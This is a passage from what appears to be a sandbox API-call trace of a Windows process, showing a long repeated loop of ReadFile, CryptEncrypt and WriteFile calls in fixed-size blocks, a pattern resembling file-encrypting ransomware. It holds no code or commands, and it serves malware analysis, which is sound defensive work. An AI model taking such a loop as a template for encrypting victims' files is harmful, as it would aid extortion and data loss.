pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.607] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.608] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.608] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.608] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.608] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.608] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.608] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.608] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.608] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.608] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.609] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.609] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.609] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.609] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.609] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.609] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.609] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.609] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.609] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.609] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.609] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.609] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.609] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.609] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.610] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.610] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.610] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.610] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.610] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.610] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.610] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.610] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.610] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.610] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.610] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.610] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.610] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.610] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.610] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.611] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.611] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.611] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.611] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.611] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.611] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.611] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.611] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.611] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.611] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.611] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.611] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.611] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.611] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.612] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.612] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.612] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.612] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.612] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.612] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.612] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.612] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.612] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.612] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.612] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.612] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.612] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.612] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.613] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.613] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.613] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.613] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.613] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.613] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.613] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.613] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.613] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.613] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.613] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.613] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.613] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.613] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.613] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.614] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.614] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.614] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.614] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.614] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.614] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.614] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.614] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.614] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.614] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.614] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.614] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.615] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.615] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.615] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.615] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.615] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.615] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.615] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.615] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.615] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.615] ReadFile (in: hFile=0x5d50, 